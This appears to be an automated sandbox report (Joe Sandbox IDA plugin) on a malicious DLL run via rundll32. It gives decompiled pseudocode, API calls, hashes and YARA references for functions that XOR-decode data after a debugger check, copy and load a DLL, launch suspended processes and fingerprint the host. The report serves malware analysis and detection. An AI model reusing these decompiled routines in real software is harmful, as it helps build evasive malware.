Opcode ID: a3b221c9c71cf84b0916dd40fa4d01affb539a29fbae8fe4750e20d2a455a4cc
Instruction ID: c7de880085743f48c4dc6eda8a205b57bb238f0f0f622972f11a8f00f1fd75af
Opcode Fuzzy Hash: a3b221c9c71cf84b0916dd40fa4d01affb539a29fbae8fe4750e20d2a455a4cc
Instruction Fuzzy Hash: 7331F174640201AFF300EBA4CC8AFDA37F9EF45391F614079F5099B1A6DA74E8428B61

Uniqueness

Uniqueness Score: -1.00%

Function 100010A0 Relevance: 3.1, APIs: 2, Instructions: 104
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			_entry_(void* __ecx, WCHAR* _a4, intOrPtr _a8) {
				long _v8;
				void* _t23;
				intOrPtr _t24;
				WCHAR* _t33;
				long _t34;
				WCHAR* _t38;
				void* _t41;
				intOrPtr _t46;
				struct _SECURITY_ATTRIBUTES* _t49;
				struct _SECURITY_ATTRIBUTES* _t50;
				void* _t59;
				void* _t65;
				void* _t67;
				intOrPtr* _t71;

				_push(__ecx);
				if(_a8 != 1) {
					if(_a8 != 0) {
						goto L12;
					} else {
						_t24 =  *0x10020d58; // 0x4a5f900
						 *((intOrPtr*)(_t24 + 0xbc))(0xaa);
						goto L8;
					}
				} else {
					E10009510();
					E100098FF();
					 *0x10020d60 = _a4;
					 *0x10020d5c = 1;
					E10014D5F(_a4);
					_a4 =  *[fs:0x30];
					if(_a4[1] != 0) {
						_t49 = 0;
						_t65 = 0x80;
						do {
							 *(_t49 + 0x1001f6f0) =  *(_t49 + 0x1001f6f0) ^ 0x000000b7;
							_t49 =  &(_t49->nLength);
						} while (_t49 < _t65);
						_t50 = 0;
						do {
							 *(_t50 + 0x1001f050) =  *(_t50 + 0x1001f050) ^ 0x000000b7;
							_t50 =  &(_t50->nLength);
						} while (_t50 < _t65);
					}
					 *0x10020d58 = E100098AE(0x1001d948, 0x140, 0xb6);
					 *_t71 = 0x7e7;
					_t33 = E1000948D(0x1001d948);
					_pop(_t59);
					_a4 = _t33;
					_t34 = GetFileAttributesW(_t33); // executed
					_push( &_a4);
					if(_t34 == 0xffffffff) {
						E1000A291();
						_t38 = E100094AD(E100019A6(_t59, 0xc1));
						_a4 = _t38;
						if(_t38 != 0) {
							_t67 = 0x6c;
							 *0x10020d50 = E100098AE(0x1001da90, _t67);
							E100017CF(_t67);
							E1000953B( &_a4, 0xfffffffe);
							_t46 =  *0x10020d58; // 0x4a5f900
							 *((intOrPtr*)(_t46 + 0xec))(1, 0x60e);
						}
						_v8 = 0;
						_t41 = CreateThread(0, 0, E1000169F, 0, 0,  &_v8);
						 *0x10020d54 = _t41;
						if(_t41 == 0) {
							goto L8;
						} else {
							L12:
							E100011EB(_a8);
							_t23 = 1;
						}
					} else {
						E1000A291();
						L8:
						_t23 = 0;
					}
				}
				return _t23;
			}

0x100010a3
0x100010ac
0x100011d4
0x00000000
0x100011d6
0x100011d6
0x100011e0
0x00000000
0x100011e0
0x100010b2
0x100010b2
0x100010b7
0x100010c0
0x100010c5
0x100010cb
0x100010d7
0x100010e3
0x100010e5
0x100010e7
0x100010ea
0x100010ea
0x100010f1
0x100010f2
0x100010f6
0x100010f8
0x100010f8
0x100010ff
0x10001100
0x100010f8
0x10001118
0x1000111d
0x10001124
0x10001129
0x1000112b
0x1000112e
0x1000113a
0x1000113b
0x1000114a
0x1000115d
0x10001162
0x10001167
0x10001170
0x1000117b
0x10001180
0x1000118b
0x10001190
0x10001199
0x10001199
0x100011a2
0x100011b4
0x100011b7
0x100011be
0x00000000
0x100011c0
0x100011c0
0x100011c3
0x100011c8
0x100011c8
0x1000113d
0x1000113d
0x10001143
0x10001143
0x10001143
0x1000113b
0x100011cd

APIs

Part of subcall function 10009510: HeapCreate.KERNELBASE(00000000,00096000,00000000,100010B7), ref: 10009519

GetFileAttributesW.KERNELBASE(00000000), ref: 1000112E
CreateThread.KERNELBASE(00000000,00000000,1000169F,00000000,00000000,?), ref: 100011B4

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: Create$AttributesFileHeapThread
String ID:
API String ID: 183707735-0
Opcode ID: b9a97e9ba8987b8b4a6afe3dfcbca0106fcc9cffada8fd1d1a9faea36bf9659a
Instruction ID: 4162b632d5d1cc40d92bf149abb497073d4d7b652b418d41a2fce86e5811987f
Opcode Fuzzy Hash: b9a97e9ba8987b8b4a6afe3dfcbca0106fcc9cffada8fd1d1a9faea36bf9659a
Instruction Fuzzy Hash: A131D075604341ABF704DFA9DC85EDA3BE9EB853D0F208129F519CB2AADB34E581CB11

Uniqueness

Uniqueness Score: -1.00%

Function 1000A2BD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102
filelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E1000A2BD(void* __ecx, void* __edx) {
				char _v8;
				WCHAR* _v12;
				char _v140;
				char _t10;
				intOrPtr _t15;
				void* _t20;
				intOrPtr _t21;
				intOrPtr _t27;
				WCHAR* _t29;
				struct HINSTANCE__* _t32;
				int _t40;
				void* _t51;
				char _t52;
				char* _t53;
				intOrPtr _t54;
				WCHAR* _t56;

				_t40 = 0;
				_t10 = E1000948D(__ecx, 0x815);
				_t54 =  *0x10020d88; // 0x4a5fc98
				_t52 = _t10;
				_t55 = _t54 + 0xb0;
				_v8 = _t52;
				E1000B76A( &_v140, 0x40, L"%08x", E1000EEEC(_t55, E1000D389(_t54 + 0xb0), 0));
				_t15 =  *0x10020d88; // 0x4a5fc98
				_t3 = _t15 + 0xa8; // 0x1
				asm("sbb eax, eax");
				_t20 = E1000948D(_t55, ( ~( *_t3) & 0x00000a5e) + 0x3e8);
				_push(0);
				_push(_t52);
				_t53 = "\\";
				_push(_t53);
				_push(_t20);
				_t21 =  *0x10020d88; // 0x4a5fc98
				_push(_t53);
				_t56 = E10009DC8(_t21 + 0x1020);
				_v12 = _t56;
				E1000A291( &_v8);
				_push(0);
				_push(L"dll");
				_push(".");
				_push( &_v140);
				_t27 =  *0x10020d88; // 0x4a5fc98
				_push(_t53);
				_t29 = E10009DC8(_t27 + 0x122a);
				 *0x10020e74 = _t29;
				CopyFileW(_t56, _t29, 0);
				_t32 = LoadLibraryW( *0x10020e74); // executed
				 *0x10020e6c = _t32;
				if(_t32 != 0) {
					_push(_t32);
					_t51 = 0x30;
					_t40 = E10009863(0x1001db08, _t51);
				}
				E1000953B( &_v12, 0xfffffffe);
				E100096BF( &_v140, 0, 0x80);
				if(_t40 == 0) {
					E1000953B(0x10020e74, 0xfffffffe);
				}
				return _t40;
			}

0x1000a2ce
0x1000a2d0
0x1000a2d5
0x1000a2db
0x1000a2de
0x1000a2e4
0x1000a307
0x1000a30c
0x1000a311
0x1000a319
0x1000a326
0x1000a32b
0x1000a32c
0x1000a32d
0x1000a332
0x1000a333
0x1000a334
0x1000a33e
0x1000a345
0x1000a34b
0x1000a34e
0x1000a353
0x1000a354
0x1000a359
0x1000a364
0x1000a365
0x1000a36f
0x1000a371
0x1000a379
0x1000a386
0x1000a392
0x1000a398
0x1000a39f
0x1000a3a1
0x1000a3a4
0x1000a3b0
0x1000a3b0
0x1000a3b8
0x1000a3cb
0x1000a3d5
0x1000a3de
0x1000a3e4
0x1000a3eb

APIs

Part of subcall function 1000B76A: _vsnwprintf.MSVCRT ref: 1000B787

Part of subcall function 10009DC8: lstrcatW.KERNEL32(00000000,00000000), ref: 10009E07

CopyFileW.KERNELBASE(00000000,00000000,00000000), ref: 1000A386
LoadLibraryW.KERNELBASE ref: 1000A392

Strings

%08x, xrefs: 1000A2F9
dll, xrefs: 1000A354

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: CopyFileLibraryLoad_vsnwprintflstrcat
String ID: %08x$dll
API String ID: 722183478-2963171978
Opcode ID: f72d2fc330ce88209f4c2237a74f7f65a0389a52750ff7e7d10f720e875abced
Instruction ID: c55651dfc9cb6555f84ec611fae2886d2378291d09008a97343f4257c843f593
Opcode Fuzzy Hash: f72d2fc330ce88209f4c2237a74f7f65a0389a52750ff7e7d10f720e875abced
Instruction Fuzzy Hash: 733184B6A403147BF740E7A4DC86F9B37ADDF85790F104166F504E7296DE34AE818760

Uniqueness

Uniqueness Score: -1.00%

Function 1000A843 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 145
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000A843(WCHAR* __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				char _v28;
				char _v29;
				intOrPtr _v40;
				short _v44;
				void* __ebx;
				signed int _t48;
				signed int _t57;
				intOrPtr _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				char _t80;
				char _t94;
				signed int _t96;
				char _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				void* _t102;
				void* _t103;

				_t95 = __edx;
				_t80 = 0;
				_v24 = __edx;
				_v20 = 0;
				_v8 = 0;
				_t48 = E1000D389("document");
				_t96 = _t48;
				_v29 = 0;
				_t98 = 0xf;
				if(_t96 <= _t98) {
					__eflags = _t96;
					if(_t96 == 0) {
						goto L5;
					}
					goto L3;
				} else {
					_t96 = _t98;
					L3:
					_t94 = _t80;
					do {
						_t5 = _t94 + 0x41; // 0x41
						 *((char*)(_t102 + _t94 - 0x28)) = _t5;
						_t94 = _t94 + 1;
					} while (_t94 < _t96);
					L5:
					lstrlenW( &_v44);
					_t97 = E1000A73E( &_v20);
					_v28 = _t97;
					if(_t97 != 0) {
						_t99 = _v20;
						_v16 = _t80;
						__eflags = _t99;
						if(_t99 == 0) {
							L27:
							E1000953B( &_v28, _t80);
							return _v8;
						} else {
							goto L11;
						}
						while(1) {
							L11:
							__eflags = _v8 - _t80;
							if(_v8 != _t80) {
								break;
							}
							_t100 = _v8;
							_v12 = 1;
							do {
								__eflags = _t100;
								if(_t100 != 0) {
									break;
								}
								E100096BF( &_v44, _t80, 0x10);
								_t60 =  *0x10020d88; // 0x4a5fc98
								_t103 = _t103 + 0xc;
								__eflags =  *(_t60 + 0x1898) & 0x00000200;
								if(__eflags != 0) {
									E1000EA4B(_t80, _t95, __eflags);
								}
								_t95 =  &_v44;
								_t62 = E1000D038( *((intOrPtr*)(_t97 + _v16 * 4)),  &_v44); // executed
								__eflags = _t62;
								if(_t62 >= 0) {
									_t95 =  &_v44;
									_t71 = E1000AA02(0x100015c3,  &_v44, _v24, _v12); // executed
									__eflags = _t71;
									if(__eflags != 0) {
										_t72 = E1000AB5A( &_v44, __eflags); // executed
										__eflags = _t72;
										if(_t72 != 0) {
											_t100 = 1;
											__eflags = 1;
										}
									}
								}
								__eflags = _v44 - _t80;
								if(_v44 != _t80) {
									__eflags = _t100;
									if(_t100 == 0) {
										_t69 =  *0x10020d58; // 0x4a5f900
										 *((intOrPtr*)(_t69 + 0x114))(_v44, _t80);
									}
									_t65 =  *0x10020d58; // 0x4a5f900
									 *((intOrPtr*)(_t65 + 0x34))(_v40);
									_t67 =  *0x10020d58; // 0x4a5f900
									 *((intOrPtr*)(_t67 + 0x34))(_v44);
								}
								_t64 = _v12 + 1;
								_v12 = _t64;
								__eflags = _t64 - 2;
							} while (_t64 <= 2);
							_t57 = _v16 + 1;
							_v8 = _t100;
							_t99 = _v20;
							_v16 = _t57;
							__eflags = _t57 - _t99;
							if(_t57 < _t99) {
								continue;
							} else {
								break;
							}
							do {
								goto L26;
							} while (_t99 != 0);
							goto L27;
						}
						L26:
						E1000953B(_t97, 0xfffffffe);
						_t97 = _t97 + 4;
						_t99 = _t99 - 1;
						__eflags = _t99;
					}
					_t74 = E1000D389("simplify");
					_v29 = _t80;
					if(_t74 > _t98) {
						do {
							L8:
							_t12 = _t80 + 0x41; // 0x41
							 *((char*)(_t102 + _t80 - 0x28)) = _t12;
							_t80 = _t80 + 1;
						} while (_t80 < _t98);
						L9:
						lstrlenW( &_v44);
						return 0;
					}
					_t98 = _t74;
					if(_t98 == 0) {
						goto L9;
					}
					goto L8;
				}
			}

0x1000a843
0x1000a84c
0x1000a84e
0x1000a856
0x1000a859
0x1000a85c
0x1000a864
0x1000a866
0x1000a869
0x1000a86c
0x1000a872
0x1000a874
0x00000000
0x00000000
0x00000000
0x1000a86e
0x1000a86e
0x1000a876
0x1000a876
0x1000a878
0x1000a878
0x1000a87b
0x1000a87f
0x1000a880
0x1000a884
0x1000a888
0x1000a896
0x1000a898
0x1000a89d
0x1000a8d4
0x1000a8d7
0x1000a8da
0x1000a8dc
0x1000a9c6
0x1000a9cb
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a8e2
0x1000a8e2
0x1000a8e2
0x1000a8e5
0x00000000
0x00000000
0x1000a8eb
0x1000a8ee
0x1000a8f5
0x1000a8f5
0x1000a8f7
0x00000000
0x00000000
0x1000a904
0x1000a909
0x1000a90e
0x1000a911
0x1000a91b
0x1000a922
0x1000a922
0x1000a92a
0x1000a930
0x1000a935
0x1000a937
0x1000a93c
0x1000a947
0x1000a94e
0x1000a950
0x1000a955
0x1000a95a
0x1000a95c
0x1000a960
0x1000a960
0x1000a960
0x1000a95c
0x1000a950
0x1000a961
0x1000a964
0x1000a966
0x1000a968
0x1000a96a
0x1000a973
0x1000a973
0x1000a979
0x1000a981
0x1000a984
0x1000a98c
0x1000a98c
0x1000a992
0x1000a993
0x1000a996
0x1000a996
0x1000a9a2
0x1000a9a3
0x1000a9a6
0x1000a9a9
0x1000a9ac
0x1000a9ae
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a9b4
0x00000000
0x00000000
0x00000000
0x1000a9b4
0x1000a9b4
0x1000a9b7
0x1000a9bd
0x1000a9c1
0x1000a9c1
0x1000a9c1
0x1000a8a4
0x1000a8a9
0x1000a8af
0x1000a8b7
0x1000a8b7
0x1000a8b7
0x1000a8ba
0x1000a8be
0x1000a8bf
0x1000a8c3
0x1000a8c7
0x00000000
0x1000a8cd
0x1000a8b1
0x1000a8b5
0x00000000
0x00000000
0x00000000
0x1000a8b5

APIs

lstrlenW.KERNEL32(?,?,?,00000001), ref: 1000A888
lstrlenW.KERNEL32(?,?,?,00000001), ref: 1000A8C7

Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1

Strings

simplify, xrefs: 1000A89F
document, xrefs: 1000A851

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: lstrlen$memset
String ID: document$simplify
API String ID: 3887242890-3319049627
Opcode ID: a0d654072406d2cf88ca564220ee3e8584bd0ac9625c12fa9a8df3b06a27825b
Instruction ID: 38bac404593f47c8c3d4ec902252394743ffc0b16ac7b4443815f8f3ec745690
Opcode Fuzzy Hash: a0d654072406d2cf88ca564220ee3e8584bd0ac9625c12fa9a8df3b06a27825b
Instruction Fuzzy Hash: 1A41B235D012199FEB01DBD4C8859ED7BF5EF4A3E0F254269E901B7249DB30ADC18BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D6D1 Relevance: 6.1, APIs: 4, Instructions: 83
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E1000D6D1(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E100096BF(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x10020d58; // 0x4a5f900
				 *((intOrPtr*)(_t23 + 0xc0))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E1000948D(_t44, 0x78);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E1000A291( &_v16);
				_t33 = E1000D3A2(_t43);
				E1000B76A( &(_t43[E1000D3A2(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000D3A2(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000EEEC(_t43, E1000D3A2(_t43) + _t40, 0);
			}

0x1000d6d1
0x1000d6da
0x1000d6e6
0x1000d6ec
0x1000d6ee
0x1000d6f6
0x1000d704
0x1000d709
0x1000d718
0x1000d720
0x1000d72d
0x1000d747
0x1000d74c
0x1000d74e
0x1000d755
0x1000d765
0x1000d776
0x1000d780
0x1000d788
0x1000d78f
0x1000d792
0x1000d7af

APIs

Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1

lstrcpynW.KERNEL32(?,?,00000100), ref: 1000D718
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000D747

Part of subcall function 1000B76A: _vsnwprintf.MSVCRT ref: 1000B787

lstrcatW.KERNEL32(?,00000114), ref: 1000D780
CharUpperBuffW.USER32(?,00000000), ref: 1000D792

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 455400327-0
Opcode ID: 6807d17cbedc06270a25dc43d6def3b120d509b0ea666ffc790bda4984b7d484
Instruction ID: 59fefc39a5dd0a038c9dcbd64369fbb0134c561318443d00a0afe8b727768b80
Opcode Fuzzy Hash: 6807d17cbedc06270a25dc43d6def3b120d509b0ea666ffc790bda4984b7d484
Instruction Fuzzy Hash: D92174B6E00214BFE700EBB4CC8AFAF77BCEF84250F104169F505E6195EA74AE458B61

Uniqueness

Uniqueness Score: -1.00%

Function 1000E47C Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E1000E47C(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E10009525(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E1000953B( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x1000e47f
0x1000e480
0x1000e487
0x1000e48f
0x1000e493
0x1000e49c
0x1000e4e2
0x1000e4e2
0x1000e4a9
0x1000e4b1
0x1000e4b3
0x1000e4b9
0x1000e4d2
0x00000000
0x1000e4d4
0x1000e4d9
0x00000000
0x1000e4df
0x1000e4bb
0x1000e4bb
0x1000e4bb
0x1000e4bb
0x1000e4b9
0x1000e4e8

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,10000000,00000000,00000000,?,1000E4FD,00000000,00000000,?,1000E526), ref: 1000E497
GetLastError.KERNEL32(?,1000E4FD,00000000,00000000,?,1000E526,00001644,?,1000B2C2), ref: 1000E49E

Part of subcall function 10009525: RtlAllocateHeap.E77242D6(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,1000E4FD,00000000,00000000,?,1000E526,00001644,?,1000B2C2), ref: 1000E4CD

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: f9ac2a2fc570e9a41b99c82958fd9a332a857a23953b2221aadec2e17e5d6f61
Instruction ID: 1eed812b881aefb00d6193f01853791bde1d72691e5b42abaf90924a6ce1d54a
Opcode Fuzzy Hash: f9ac2a2fc570e9a41b99c82958fd9a332a857a23953b2221aadec2e17e5d6f61
Instruction Fuzzy Hash: 6701AD72601265BFE721CBA6DC88D9B7FECEF457E1B214165F905E2225E670EE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D038 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E1000D038(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E100096BF(__edx, 0, 0x10);
				E100096BF( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x1000d049
0x1000d056
0x1000d05e
0x1000d07a
0x1000d080
0x1000d087

APIs

Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 1000D07A

Strings

D, xrefs: 1000D05E

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: CreateProcessmemset
String ID: D
API String ID: 2296119082-2746444292
Opcode ID: 08a68ca6bed26796d2f65aae0e32a790fb89cb291b57576b5f3120a1785990cd
Instruction ID: d27b247edd7bdbe7ca00ef79e088292ca0cbd604f99a00e4c77ad78c7c6d32b5
Opcode Fuzzy Hash: 08a68ca6bed26796d2f65aae0e32a790fb89cb291b57576b5f3120a1785990cd
Instruction Fuzzy Hash: 29F065F26402183EF720E6A5CC0AFBF3AACCB81750F500025BF05EB1D1E6A0BD0582B5

Uniqueness

Uniqueness Score: -1.00%

Function 1000A0E3 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E1000A0E3(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v24;
				short _v40;
				void* _t24;
				signed int _t33;
				intOrPtr _t39;
				signed int _t40;
				signed int _t41;
				intOrPtr _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				signed int _t52;
				signed int _t55;
				void* _t57;
				void* _t58;

				_t49 = __edx;
				_t52 = _a12;
				_t39 = __ecx;
				_v8 = __ecx;
				_t55 = _t52;
				if(_t52 >= __edx) {
					L4:
					_t40 = 0x10020e3a;
					L5:
					_t44 = 0;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsw");
					asm("movsb");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_t24 = 0;
					if(_v24 == 0) {
						L8:
						_t50 = _t24;
						if(_t50 == 0) {
							L10:
							lstrlenW( &_v40);
							return _t40;
						} else {
							goto L9;
						}
						do {
							L9:
							_t11 = _t44 + 0x30; // 0x30
							 *((char*)(_t58 + _t44 - 0x24)) = _t11;
							_t44 = _t44 + 1;
						} while (_t44 < _t50);
						goto L10;
					} else {
						goto L6;
					}
					do {
						L6:
						_t24 = _t24 + 1;
					} while ( *((intOrPtr*)(_t58 + _t24 - 0x14)) != 0);
					_t50 = 0xe;
					if(_t24 > _t50) {
						goto L9;
					}
					goto L8;
				}
				_t45 = _a4;
				while( *((intOrPtr*)((_t55 & 0x0000007f) + _t45)) !=  *((intOrPtr*)(_t55 + _t39))) {
					_t55 = _t55 + 1;
					if(_t55 < _t49) {
						continue;
					}
					goto L4;
				}
				_t57 = _t55 - _t52;
				if(_t57 == 0) {
					goto L4;
				}
				_t33 = E10009525(_t57 + 1); // executed
				_t41 = _t33;
				_a12 = _t41;
				if(_t41 != 0) {
					_t51 = _a4;
					_t42 = _v8;
					_t48 = _t41 - _t52;
					do {
						 *(_t48 + _t52) =  *((_t52 & 0x0000007f) + _t51) ^  *(_t52 + _t42);
						_t52 = _t52 + 1;
						_t57 = _t57 - 1;
					} while (_t57 != 0);
					_t40 = _a12;
					goto L5;
				}
				return 0x10020e3a;
			}

0x1000a0e3
0x1000a0ec
0x1000a0ef
0x1000a0f1
0x1000a0f4
0x1000a0f8
0x1000a10f
0x1000a10f
0x1000a114
0x1000a11e
0x1000a120
0x1000a121
0x1000a122
0x1000a123
0x1000a125
0x1000a129
0x1000a12a
0x1000a12b
0x1000a12c
0x1000a12e
0x1000a12f
0x1000a134
0x1000a144
0x1000a144
0x1000a148
0x1000a156
0x1000a15a
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a14a
0x1000a14a
0x1000a14a
0x1000a14d
0x1000a151
0x1000a152
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a136
0x1000a136
0x1000a136
0x1000a137
0x1000a13f
0x1000a142
0x00000000
0x00000000
0x00000000
0x1000a142
0x1000a0fa
0x1000a0fd
0x1000a10a
0x1000a10d
0x00000000
0x00000000
0x00000000
0x1000a10d
0x1000a167
0x1000a169
0x00000000
0x00000000
0x1000a16f
0x1000a174
0x1000a176
0x1000a17c
0x1000a185
0x1000a18a
0x1000a18d
0x1000a18f
0x1000a19a
0x1000a19d
0x1000a19e
0x1000a19e
0x1000a1a3
0x00000000
0x1000a1a3
0x00000000

APIs

lstrlenW.KERNEL32(?,00000140,?,1001D948), ref: 1000A15A

Strings

GetCurrentPath, xrefs: 1000A114

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
